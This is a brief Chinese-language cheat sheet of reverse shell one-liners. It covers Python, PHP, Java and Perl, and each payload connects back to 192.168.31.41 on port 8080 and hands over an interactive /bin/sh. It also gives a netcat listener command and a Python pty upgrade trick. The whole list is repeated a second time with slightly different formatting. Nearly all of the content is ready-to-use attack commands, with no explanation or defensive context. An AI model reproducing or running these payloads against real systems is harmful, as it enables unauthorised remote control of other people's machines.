shell一句话

###python脚本反弹
python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.31.41”,8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’

###php 脚本反弹
php -r ‘$sock=fsockopen(“192.168.31.41”,8080);exec(“/bin/sh -i <&3 >&3 2>&3”);’

###Java 脚本反弹
r = Runtime.getRuntime()p = r.exec([“/bin/bash”,”-c”,”exec 5<>/dev/tcp/192.168.31.41/8080;cat <&5 | while read line; do \$line 2>&5 >&5; done”] as String[])p.waitFor()

###perl 脚本反弹
perl -e ‘use Socket;$i=”192.168.31.41”;$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’

###NC 监听一句话
nc -v -l -v -p 8080

#####NC 无法使用su命令解决办法：
python -c ‘import pty; pty.spawn(“/bin/sh”)’

python脚本反弹

python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.31.41”,8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’
php 脚本反弹

php -r ‘$sock=fsockopen(“192.168.31.41”,8080);exec(“/bin/sh -i <&3 >&3 2>&3”);’
Java 脚本反弹

r = Runtime.getRuntime()p = r.exec([“/bin/bash”,”-c”,”exec 5<>/dev/tcp/192.168.31.41/8080;cat <&5 | while read line; do \$line 2>&5 >&5; done”] as String[])p.waitFor()
perl 脚本反弹

perl -e ‘use Socket;$i=”192.168.31.41”;$p=8080;socket(S,PF_INET,SOCK_STREAM,getprotobyname(“tcp”));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,”>&S”);open(STDOUT,”>&S”);open(STDERR,”>&S”);exec(“/bin/sh -i”);};’
NC 监听一句话

nc -v -l -v -p 8080
NC 无法使用su命令解决办法：

python -c ‘import pty; pty.spawn(“/bin/sh”)’